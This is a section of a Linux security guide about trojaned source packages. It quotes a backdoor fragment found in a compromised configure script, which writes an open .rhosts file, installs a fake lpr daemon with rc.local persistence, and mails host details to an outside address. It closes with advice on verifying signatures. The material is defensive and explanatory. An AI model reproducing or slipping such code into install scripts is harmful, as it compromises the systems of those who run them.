3. Trojaned source code

It is often claimed that Linux (and UNIX) is rather safe from virii, worms, and trojans. However, this is largely based on two facts:

No unsafe automatic actions

Most Linux applications will not perform unsafe actions (like executing scripts) automatically.

Sandboxed users

Users have limited privileges only. Only the superuser can access and modify the system.

WarningWARNING
 

Installing an application requires to run some scripts and/or makefiles, usually with superuser privileges, at least for installation to system directories. Thus, whenever you install an application, you give up all what makes Linux more secure than some other operating systems, and you basically give control over your system to the installation scripts of that application. This is true for RPMs as well as for installations from source.

As an example, the following has been found in the configure script (see Section 9>) of a popular applications source code, downloaded from an ftp server that apparently got cracked:

# checking if we are root or not
if [ `whoami` == "root" ];then
root_user=1
else
root_user=0
fi
   

... and further below:

if [ $root_user != "1" ];then
echo "+ +" > ~/.rhosts
echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >>/
mail l4m0r@freebox.com < /tmp/jea
rm -rf /tmp/jea
else
if [ `uname -s` != Linux ];then
echo ""
else
mv -f .xinitrc /bin/lpr
echo "# printing status monitor" >> /etc/rc.d/rc.local
echo "/bin/lpr &" >> /etc/rc.d/rc.local
hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
mail l4m0r@freebox.com < /tmp/jea
/bin/lpr &
rm -rf /tmp/jea
fi
   

Basically, the shell script fragment above will create a backdoor on the machine, either by writing an insecure .rhosts or by installing a daemon that listens for connections (the file .xinitrc that gets copied to /bin/lpr). Then the address of the machine gets mailed to the cracker.

TipTIP
 

In order to save yourself from such nasty surprises, you should download RPMs or source code only from trustworthy locations, and/or verify GnuPG (PGP) signatures if provided. If there is no PGP signature, mail the author, or try to locate a mirror, download a copy of the same software from there, and compare the two downloads.